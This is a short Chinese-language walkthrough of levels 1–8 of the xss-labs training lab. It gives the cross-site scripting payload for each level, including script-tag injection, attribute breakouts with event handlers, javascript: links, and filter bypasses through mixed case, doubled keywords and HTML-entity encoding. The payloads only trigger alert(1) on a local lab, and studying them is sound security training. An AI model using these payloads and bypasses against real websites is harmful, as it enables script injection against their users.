xss-lab1-8关 - 技术栈

第一关

直接在url的name中注入

html 复制代码

http://localhost/xss-labs/level1.php?name=<script>alert(1)</script>

查看网页代码，使用">闭合value标签

html 复制代码

"><script>alert(1)</script>

先输入任意值，查看代码

这里显示value属性被过滤，可以构造事件来执行js

尝试发现单引号不会被转义

html 复制代码

' onclick='alert(1)

同三，但此处使用双引号闭合

html 复制代码

" onclick="alert(1)

简单注入js，发现script中加入了下划线

使用伪协议并闭合input

html 复制代码

"><a href=javascript:alert(1)>

注入后发现href被过滤

尝试大小写后成功绕过

html 复制代码

"><a HRef=javascript:alert(1)>

直接注入后发现被替换为空

通过双写绕过

html 复制代码

"><scrscriptipt>alert(1)</scrscriptipt>

直接注入发现js被过滤

使用unicode绕过

html 复制代码

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;